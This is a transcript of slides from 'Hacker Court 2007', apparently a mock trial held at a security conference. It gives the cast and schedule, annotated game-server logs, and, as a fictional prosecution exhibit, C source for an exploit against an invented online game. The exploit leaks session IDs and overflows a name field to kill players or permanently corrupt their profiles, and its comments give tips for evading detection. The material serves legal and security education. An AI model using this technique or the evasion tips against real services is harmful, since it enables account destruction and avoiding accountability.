Presentation is loading. Please wait.

Presentation is loading. Please wait.

Hacker Court 2007 CAST JUDGE: Richard Salgado – Attorney, Former Senior Counsel of CCIPS division of DoJ COURT CLERK: Caitlin Klein.

Similar presentations


Presentation on theme: "Hacker Court 2007 CAST JUDGE: Richard Salgado – Attorney, Former Senior Counsel of CCIPS division of DoJ COURT CLERK: Caitlin Klein."— Presentation transcript:

1 Hacker Court 2007

2 CAST JUDGE: Richard Salgado – Attorney, Former Senior Counsel of CCIPS division of DoJ COURT CLERK: Caitlin Klein EMCEE: Carole Fennelly, Senior Security Engineer, Tenable Network Security PROSECUTOR : Jennifer Granick, Director, Center for Internet and the Law, Stanford University DEFENSE ATTORNEY: Kevin Bankston – Attorney, Electronic Frontier Foundation CASE AGENT (TSA – AGENT SMITH): Brian Martin – Attrition PROSECUTION EXPERT: Jesse Kornblum– Former Captain, USAFOSI GETTA INDUSTRIES CEO, MICHAEL BAGGINS: Richard Thieme – President, Thiemeworks GETTA INDUSTRIES IT DIRECTOR, FREDO BAGGINS: Jonathan Klein – Regional Security Director - North, Calence, LLC DEFENDANT (DAVID NELSON): Ryan Bulat - Intern, Wizard’s Keys Corp. DEFENSE EXPERT (Jeffrey Liebowski): Simple Nomad - NMRC

3 Schedule 18:30 – Introductions, Court Called to Order 18:35 – 19:05 Opening Statements 19:05 – 19:20 Michael Baggins 19:20 – 19:35 Fredo Baggins 19:35 – 19:50 Agent Smith 19:50 – 20:05 Jesse Kornblum 20:05 – 20:15 break 20:15 – 20:30 Jeffrey Liebowski 20:30 – 20:45 Closing Statements 20:45 – 21:15 panel discussion

4 Witness classification Factual: testifies to events directly witnessed or observed. May only testify regarding facts, not draw conclusions. Expert: specifically qualified by the court as an expert in the subject at hand. May offer opinion and draw conclusions based on knowledge and expertise.

5 Prosecution Opening Statement Enter Key Points Here

6 Defense Opening Statement Enter Key Points Here

7 Prosecution Witness 1 Michael Baggins is the President of Getta Industries testifying as a factual witness on impact to his company based on David Nelson’s Actions.

8 Prosecution Witness 2 Fredo Baggins is the not so bright younger brother of Michael Baggins. He is the IT Director of Getta Industries testifying as a factual witness on impact to his company based on David Nelson’s Actions.

9 Defense Exhibit 1

10 Prosecution Witness 3 Agent Smith is the TSA Case Agent. He is testifying as a factual and expert witness on the search of David Nelson’s personal affects.

11 Stipulations Factual: an agreement between prosecution and defense on particular facts, eliminating the need for testimony. Testimonial: an agreement between prosecution and defense that a particular witness would testify in the manner stipulated, if called to the stand.

12 Government Exhibit 1 DISCLAIMER: The following document is a fictionalized testimonial stipulation for the Black Hat 2003 Conference. The witness of the stipulation does not exist, nor was any evidence in this matter gathered. __________________________________ x | UNITED STATES OF AMERICA, | | -v.- | | STIPULATION David Nelson, | | Defendant, | | __________________________________ IT IS HEREBY STIPULATED AND AGREED between the United States of America, Jennifer Granick, Assistant United States Attorney, of counsel, and the defendant DAVID NELSON, by his attorney Kevin Bankston, Esq.: If called as a witness, Gob Bluth, would testify as follows: 1)He’s the Policy Enforcement officer at Bluth Industries Internet Access division(bluth.com) which is located in Orange County, California. 2)bluth.com provides high speed internet access to the Maryland area. Internet access is provided by Digital Subscriber Line (DSL) and Dialup-Connection. 3)When a subscriber connects to the bluth.com backbone, the subscriber is provided with an Internet Protocol (IP) address that is unique to the subscriber during their session 4)bluth.com is assigned the Class B address and by the American Registry of Internet Numbers (ARIN) to provide IP addresses for its customers.

13 Government Exhibit 1-2 4)Mr. Bluth has reviewed the business records maintained by bluth.com for June 15 th – July 15 th, 2006 and determined that IP address was assigned to the computer owned by Mr. David Nelson, 1445 West End Ave, Burbank, CA 5)Mr. Bluth has reviewed the business records maintained by bluth.com for June 15 th – July 15 th, 2006 and determined that IP address was assigned to the computer owned by Ms. Betty Nelson, )West End Ave, Burbank, CA 7)Mr. Bluth has reviewed the business records maintained by bluth.com for June 15 th – June 15 th, 2006 and determined that the above IP address were active during those times. IT IS FURTHER STIPULATED AND AGREED that this stipulation may be received in evidence as a Government exhibit at trial. Dated: July 1, 2007 By:____________________________ JENNIFER GRANICK Assistant United States Attorney By: ___________________________ KEVIN BANKSTON, ESQ. Attorney for David Nelson

14 Prosecution Exhibit 2 Output of /var/log/mom.log Jul 27 14:14:33 localhost momd: UserLogonRequest for Talisman from Jul 27 14:14:33 localhost momd: UserLogonSuccessful for Talisman from Jul 27 14:14:33 localhost momd: RequestUserSessionId for Talisman from Jul 27 14:14:33 localhost momd: ReplyUserSessionId for Talisman to (0x9816a7b7) Jul 27 16:01:16 localhost momd: UserLogonRequest for CrimsonKnight from Jul 27 16:01:16 localhost momd: UserLogonSuccessful for CrimsonKnight from Jul 27 16:01:16 localhost momd: RequestUserSessionId for CrimsonKnight from Jul 27 16:01:17 localhost momd: ReplyUserSessionId for CrimsonKnight to (0xfa453c90) Jul 27 16:05:59 localhost momd: UserLogonRequest for GalleySlave from Jul 27 16:05:59 localhost momd: UserLogonSuccessful for GalleySlave from Jul 27 16:05:59 localhost momd: RequestUserSessionId for GalleySlave from Jul 27 16:05:59 localhost momd: ReplyUserSessionId for GalleySlave from (0xaf049289) Jul 27 16:05:59 localhost momd: RequestChatP GalleySlave (0xaf049289) to Talisman Jul 27 16:05:59 localhost momd: ReplyChatP Talisman (0x9816a7b7) for GalleySlave (0xaf049289) Jul 27 16:06:00 localhost momd: UpdateScreenName for Talisman from (0x9816a7b7) Jul 27 16:06:05 localhost momd: UserEvent 0x122 - CrimsonKnight -> Talisman Jul 27 16:06:06 localhost momd: UserEvent 0x123 - CrimsonKnight -> Talisman Jul 27 16:06:07 localhost momd: UserEvent 0x128 - CrimsonKnight -> Talisman Jul 27 16:06:08 localhost momd: UserEvent 0x188 - CrimsonKnight -> Talisman Jul 27 16:07:38 localhost momd: InventoryUpdate for CrimsonKnight from Jul 27 16:07:38 localhost momd: UserLogoff for CrimsonKnight from Jul 27 16:07:38 localhost momd: UserEvent 0x215 - Talisman Jul 27 16:09:01 localhost momd: AutoLogoff for GalleySlave from

15 Prosecution Exhibit 3 Output from /var/log/mom.log - annotated User Talisman logs in: Jun 27 14:14:33 localhost momd: UserLogonRequest for Talisman from Jun 27 14:14:33 localhost momd: UserLogonSuccessful for Talisman from Jun 27 14:14:33 localhost momd: RequestUserSessionId for Talisman from Jun 27 14:14:33 localhost momd: ReplyUserSessionId for Talisman to (0x9816a7b7) User CrimsonKnight logs in: Jun 27 16:01:16 localhost momd: UserLogonRequest for CrimsonKnight from Jun 27 16:01:16 localhost momd: UserLogonSuccessful for CrimsonKnight from Jun 27 16:01:16 localhost momd: RequestUserSessionId for CrimsonKnight from Jun 27 16:01:17 localhost momd: ReplyUserSessionId for CrimsonKnight to (0xfa453c90) User GalleySlave logs in: Jun 27 16:05:59 localhost momd: UserLogonRequest for GalleySlave from Jun 27 16:05:59 localhost momd: UserLogonSuccessful for GalleySlave from Jun 27 16:05:59 localhost momd: RequestUserSessionId for GalleySlave from Jun 27 16:05:59 localhost momd: ReplyUserSessionId for GalleySlave from (0xaf049289) User GalleySlave uses old RequestChatP and gets Talisman's session ID: Jun 27 16:05:59 localhost momd: RequestChatP GalleySlave (0xaf049289) to Talisman Jun 27 16:05:59 localhost momd: ReplyChatP Talisman (0x9816a7b7) for GalleySlave (0xaf049289) User Talisman updates his screenname to Talisman from GalleySlave's IP address Jun 27 16:06:00 localhost momd: UpdateScreenName for Talisman to Talisman from (0x9816a7b7)

16 Prosecution Exhibit seconds later CrimsonKnight challenges Talisman to battle (UserEvent 0x122) Jun 27 16:06:05 localhost momd: UserEvent 0x122 - CrimsonKnight -> Talisman 1 second later CrimsonKnight uses magic against Talisman (UserEvent 0x123) Jun 27 16:06:06 localhost momd: UserEvent 0x123 - CrimsonKnight -> Talisman 1 second later CrimsonKnight damages Talisman (UserEvent 0x128) Jun 27 16:06:07 localhost momd: UserEvent 0x128 - CrimsonKnight -> Talisman 1 second later CrimsonKnight kills Talisman (UserEvent 0x188) Jun 27 16:06:08 localhost momd: UserEvent 0x188 - CrimsonKnight -> Talisman Minute and a half later CrimsonKnight updates inventory (more than likely with battlespoils) and logs off Jun 27 16:07:38 localhost momd: InventoryUpdate for CrimsonKnight from Jun 27 16:07:40 localhost momd: UserLogoff for CrimsonKnight from Talisman resurrects from the dead (UserEvent 0x215) Jun 27 16:07:56 localhost momd: UserEvent 0x215 - Talisman 3 minutes after last activity from GalleySlave with no activity, he is logged off Jun 27 16:09:01 localhost momd: AutoLogoff for GalleySlave from

17 Prosecution Witness 4 Jesse Kornblum is an independent government contractor assigned to the TSA. He is testifying as a factual and expert witness on his forensic examination of David Nelson’s computer.

18 Prosecution Exhibit 4-1 /* * Crimson Death * Written by Crimson Knight * * Background * * Ok, how this works is simple. The golden_fleece exploit allowed you * to update your health and stay strong during battle, but if you have * the victim's current session id you can reset his health for him. * Since the session id is treated like a password, all you need is * the session id, no stealing of passwords required. During the first * beta of MoM, the peer-to-peer chat system actually gave you the * session id, but peer-to-peer chat was eliminated after the first * beta. * * Or so we thought! * * The code is still in the server software! All we need to do is send * the old RequestChatP and the server replies with the victim's session * id as well as the IP address. Then you simply send in the * UpdateScreenName request with a modified health value and the victim's * session id, and the health is updated! * * Caveats * * You can drop anyone's health online, however if no one is near them * and they are not in battle, any self-healing will kick in and they do * not die. Plus it is more fun to watch them drop! So get close enough

19 Prosecution Exhibit 4-2 * for any type of interaction (does not have to be battle), and launch * the exploit. Since you are close to them, the evaluation routines that * determine battle and conversation levels for interaction are active * on the server, and you get an instant reaction. * * You cannot damage the health of familiars, monsters, and other NPCs, * just fellow users. * * Damage * * There are three damage types, temp kill, perm kill, and near kill: * * Option 1 - Temp kill. This damage lowers the health of the victim * to 0, rendering them dead instantly. They can resurrect as normal. * * Option 2 - Perm kill. The health is set to While this * may seem wrong, it passes the checks and is used for comparison as * a signed integer instead of an unsigned integer, making the value * -1. During the experience and karma adjustments after the kill, this * causes values in the user profile to become invalid, and the user * profile is totally unuseable! Nothing, including inventory can be * recovered. The user profile can not and will not resurrect! * * Option 3 - Near kill. This damage lowers the health to 1, leaving * them vulnerable to a quick and easy kill. All spoils of war rules * are in affect. * * Prevention * * Disable all chat capabilities in your profile before use. We usually * use Skype to communicate anyway, so this isn't a big deal. If you * must communicate with other non-clan folk, use a familiar. *

20 Prosecution Exhibit 4-3 * Tips * ---- * 1. Do not run the exploit from your home computer, especially the * same computer you game from! It can run on a separate computer, so * use a shell on a different system. The exploit does not require root * to run. Although Getta seems incompetent when it comes to catching * cheaters, they may be logging IP addresses. * 2. Do not use your main user id and password. Use a secondary account, * ask around the clan as someone always has some extra accounts, and * any valid account will work. * 3. If you time the exploit using damage option 3 and a fireball, * frost, or shock spell, the victim will simply assume your spell is * massively powerful and not notice their health dropped before the * spell actually hit them. * 4. Use damage option 2 sparingly. It will draw needless attention to * the flaw. Use it only for those assholes most deserving! * * -Crim */ #include

21 Prosecution Exhibit 4-4 /* for reference, this is incomplete but this is all we need... * it is based upon the golden_fleece exploit which allows overwriting * the health, stamina, etc of your own character struct userprofile { uint32 userid; uint32 name_len; char name[64]; uint32 health; uint32 stamina; uint32 experience; uint32 level; etc etc... } up; */ #define VERSION "1.0" #define MAXBUF 512 #define SERVER " " #define PORT /* shorthand */ typedef unsigned char uint8; typedef unsigned short uint16; typedef unsigned long uint32; /* globals */ char buffer_out[MAXBUF]; char buffer_in[MAXBUF]; uint32 my_session_id; uint32 victim_session_id;

22 Prosecution Exhibit 4-5 void clean_buf(void) { memset(buffer_out,0,MAXBUF); memset(buffer_in,0,MAXBUF); } void caughtsig(int sig) { fprintf(stdout,"Operation timed out\n"); exit(sig); } void usage(char *prog) { fprintf(stderr,"USAGE: "); fprintf(stderr,"%s -u yourid -p yourpassword -v victimid [opts]\n\n",prog); fprintf(stderr," opts are k t h\n"); fprintf(stderr," -d type type is 0 for temp kill,\n"); fprintf(stderr," 1 for perm kill, and 2 for\n"); fprintf(stderr," near kill\n"); fprintf(stderr," -t timeout timeout in seconds (default 10)\n"); fprintf(stderr," -h this help screen\n"); fprintf(stderr,"\n"); } typedef struct RequestUserSessionId { uint32 header;// always \xff\xff\xff\xff uint32 mom1;// always \x4d\x6f\x4d\x31 uint32 command;// always \x04\x01\x00\x00 uint32 userid_len;// length of user id char userid[64];// user id

23 Prosecution Exhibit 4-6 uint32 pass_len;// length of password char password[64];// password uint32 tail;// always \xff\xff\xff\xff } requestusersessionid; typedef struct ReplyUserSessionId { uint32 header;// always \xff\xff\xff\xff uint32 mom1;// always \x4d\x6f\x4d\x31 uint32 command; // always \x05\x01\x00\x00 uint32 id;// session id; } replyusersessionid; // ChatP protocol left over from beta1, but still supported on // MoM servers, the P was for peer-to-peer, not supported on // MoM client side since beta2. typedef struct RequestChatP { uint32 header;// always \xff\xff\xff\xff uint32 mom1;// always \x4d\x6f\x4d\x31 uint32 command;// always \x01\x0a\x00\x00 uint32 id;// our session id uint32 chat_len;// length of victim chat name char name[64];// victim's chat name uint32 random;// ??? } requestchatp; // Note the reply contains the victim's current session ID and // ip address, what the fuck were they smoking? LOLZ typedef struct ReplyChatP { uint32 header; // always \xff\xff\xff\xff uint32 mom1; // always \x4d\x6f\x4d\x31

24 Prosecution Exhibit 4-7 uint32 command; // always \x02\x0a\x00\x00 uint32 id;// victim's session id! wtf! uint32 ip;// victim's ip address uint16 udp_port;// victim's chat port uint16 unknown1;// always \xff\xff uint32 random;// ??? } replychatp; typedef struct CrimsonDeath { uint32 header; // always \xff\xff\xff\xff uint32 mom1; // always \x4d\x6f\x4d\x31 uint32 command; // always \x0a\x07\x00\x00 uint32 id;// session id (like the password!) uint32 name_len;// length of new name, make it 68 to overwrite // victim's health on the server! char name[64];// 64 plus 4 bytes to overwrite health uint32 health;// 0 means death, means perm death! // (it corrupts the userprofile, but no loot) // 1 means they are very very easy to kill and // you can grab stuff they drop! } crimdeath; int send_udp(int size) { int s,rc; struct sockaddr_in serveraddr; struct hostent *hostp; char *bufptr = buffer_out; if((s = socket(AF_INET, SOCK_DGRAM, 0)) < 0) { perror("send_udp: socket() error"); exit(-1);

25 Prosecution Exhibit 4-8 } memset(&serveraddr,0,sizeof(struct sockaddr_in)); serveraddr.sin_family = AF_INET; serveraddr.sin_port = htons(PORT); { hostp = gethostbyname(SERVER); if(hostp == (struct hostent *)NULL) { printf("HOST NOT FOUND --> "); printf("h_errno = %d\n", h_errno); exit(-1); } memcpy(&serveraddr.sin_addr, hostp->h_addr, sizeof(serveraddr.sin_addr)); } rc = sendto(s, bufptr, size, 0, (struct sockaddr *)&serveraddr, sizeof(serveraddr)); if(rc < 0) { perror("send_udp: sendto() error"); close(s); exit(-1); } return(s); } int recv_udp(int s) { int rc; struct sockaddr_in serveraddr; int serveraddrlen = sizeof(serveraddr); char *bufptr = buffer_in; int buflen = sizeof(buffer_in); memset(&serveraddr,0,sizeof(struct sockaddr_in)); rc = recvfrom(s, bufptr, buflen, 0, (struct sockaddr *)&serveraddr, (socklen_t *)serveraddrlen); close(s); return(rc); }

26 Prosecution Exhibit 4-9 int get_our_session_id(char *name, char *password) { struct RequestUserSessionId *reqsessid; struct ReplyUserSessionId *repsessid; int rc; if((reqsessid = malloc(sizeof(struct RequestUserSessionId))) == NULL) { perror("get_our_session_id: malloc() error\n"); exit(-1); } memset(&reqsessid,0,sizeof(struct RequestUserSessionId)); if((repsessid = malloc(sizeof(struct ReplyUserSessionId))) == NULL) { perror("get_our_session_id: malloc() error\n"); exit(-1); } memset(&repsessid,0,sizeof(struct ReplyUserSessionId)); reqsessid->header = 0xffffffff; reqsessid->mom1 = 0x314d6f4d; reqsessid->command = 0x104; reqsessid->userid_len = strlen(name); memcpy(&reqsessid->userid,name,strlen(name)); reqsessid->pass_len = strlen(password); memcpy(&reqsessid->password,password,strlen(password)); reqsessid->tail = 0xffffffff; clean_buf(); memcpy(&buffer_out,reqsessid,sizeof(reqsessid)); rc = recv_udp(send_udp(sizeof(reqsessid))); memcpy(&repsessid,buffer_in,sizeof(repsessid));

27 Prosecution Exhibit 4-10 if(repsessid->command == 0x105) { my_session_id = repsessid->id; rc = 1; } else { rc = -1; } free(reqsessid); free(repsessid); return(rc); } int get_victim_session_id(char *victim) { struct RequestChatP *reqchatp; struct ReplyChatP *repchatp; int rc; if((reqchatp = malloc(sizeof(struct RequestChatP))) == NULL) { perror("get_victim_session_id: malloc() error\n"); exit(-1); } memset(&reqchatp,0,sizeof(struct RequestChatP)); if((repchatp = malloc(sizeof(struct ReplyChatP))) == NULL) { perror("get_victim_session_id: malloc() error\n"); exit(-1); } memset(&repchatp,0,sizeof(struct ReplyChatP));

28 Prosecution Exhibit 4-11 reqchatp->header = 0xffffffff; reqchatp->mom1 = 0x314d6f4d; reqchatp->command = 0xa01; reqchatp->id = my_session_id; reqchatp->chat_len = strlen(victim); memcpy(&reqchatp->name,victim,strlen(victim)); reqchatp->random = 0xaddeadde; clean_buf(); memcpy(&buffer_out,reqchatp,sizeof(reqchatp)); rc = recv_udp(send_udp(sizeof(reqchatp))); memcpy(&repchatp,buffer_in,sizeof(repchatp)); if(repchatp->command == 0x102) { victim_session_id = repchatp->id; rc = 1; } else { rc = -1; } free(reqchatp); free(repchatp); return(rc); } void crimson_death(char *victim, int damage) { struct CrimsonDeath *crimsondeath; int rc;

29 Prosecution Exhibit 4-12 if((crimsondeath = malloc(sizeof(struct CrimsonDeath))) == NULL) { perror("crimson_death: malloc() error\n"); exit(-1); } memset(&crimsondeath,0,sizeof(struct CrimsonDeath)); crimsondeath->header = 0xffffffff; crimsondeath->mom1 = 0x314d6f4d; crimsondeath->command = 0x70a; crimsondeath->id = victim_session_id; crimsondeath->name_len = 68; memcpy(&crimsondeath->name,victim,strlen(victim)); switch(damage) { case 0: crimsondeath->health = 0; break; case 1: crimsondeath->health = 0x ; break; case 2: crimsondeath->health = 1; break; } clean_buf(); memcpy(&buffer_out,crimsondeath,sizeof(crimsondeath)); rc = send_udp(sizeof(crimsondeath)); free(crimsondeath); } // end post arg processing

30 Prosecution Exhibit 4-13 /* * main */ int main(int argc, char **argv) { char *prog; char *userid; char *password; char *victim; char ch; int damage,rc,timeout = 10,u=0,v=0,p=0; prog = argv[0]; fprintf(stdout,"Crimson Death v%s\n",VERSION); fprintf(stdout,"Written by Crimson Knight \n\n"); while ((ch = getopt(argc, argv, "u:p:v:k:h?t:")) != EOF) switch(ch) { case 'k': damage = (int)strtol(optarg,NULL,10); if((damage 2)) { fprintf(stdout,"Error: invalid damage type\n"); usage(prog); exit(-1); } break;

31 Prosecution Exhibit 4-14 case 'u': userid = optarg; u++; break; case 'p': password = optarg; p++; break; case 'v': victim = optarg; v++; break; case 't': timeout = (int)strtol(optarg,NULL,10); if(timeout<10) timeout = 10; if(timeout>100) { fprintf(stdout,"Error: timeout value too high\n"); usage(prog); exit(-1); } break; case 'h': case '?': usage(prog); exit(0); default: fprintf(stdout,"Error: unknown option\n"); usage(prog); exit(-1); }

32 Prosecution Exhibit 4-15 // post arg processing if(!u) { fprintf(stdout,"Error: -u option needs a userid\n"); usage(prog); exit(-1); } if(!p) { fprintf(stdout,"Error: -p option needs a password\n"); usage(prog); exit(-1); } if(!v) { fprintf(stdout,"Error: -v option needs a victim\n"); usage(prog); exit(-1); } if(!damage) { fprintf(stdout,"Using default of 0 damage (temp kill)\n"); damage = 0; }

33 Prosecution Exhibit 4-16 // time for evil... signal(SIGALRM, caughtsig); alarm(timeout); fprintf(stdout,"[+] Getting our session ID\n"); rc = get_our_session_id(userid,password); alarm(0); if(rc == 1) fprintf(stdout,"[+] Done!\n"); else { fprintf(stdout,"[-] Failed!\n"); exit(-1); } alarm(timeout); fprintf(stdout,"[+] Getting %s session ID\n",victim); rc = get_victim_session_id(victim); alarm(0); if(rc == 1) fprintf(stdout,"[+] Done!\n"); else { fprintf(stdout,"[-] Failed! Is %s the correct name?\n",victim); exit(-1); } fprintf(stdout,"[+] Deal out some damage....\n"); crimson_death(victim,damage); fprintf(stdout,"[+] See if %s is still standing!\n",victim); exit(1); }

34 Defense Exhibit 2 Place holder for Jesse Photo (You didn’t think I would just put it in here)

35 Prosecution Exhibit 5 Itemized Damages to Getta Industries login33003/tcp

36 Defense Witness 1 Jeffrey Liebowski is testifying as an expert in general computer knowledge. He is giving expert witness testimony to refute the government’s experts. He is also an avid bowler.

37 Prosecution Exhibit 6 Picture of Liebowski

38 Defense Witness 2 David Nelson is the defendant and is not required to take the stand, but has the right to do so if he chooses. His attorney should discourage him from doing so, since the judge can add extra points to his sentence for perjury and obstruction of justice, if he is found guilty.

39 Prosecution Closing Statements

40 Prosecution Exhibit 6 Picture of ”The Dude”

41 Defense Closing Statements

42 Panel Discussion


Download ppt "Hacker Court 2007 CAST JUDGE: Richard Salgado – Attorney, Former Senior Counsel of CCIPS division of DoJ COURT CLERK: Caitlin Klein."

Similar presentations


Ads by Google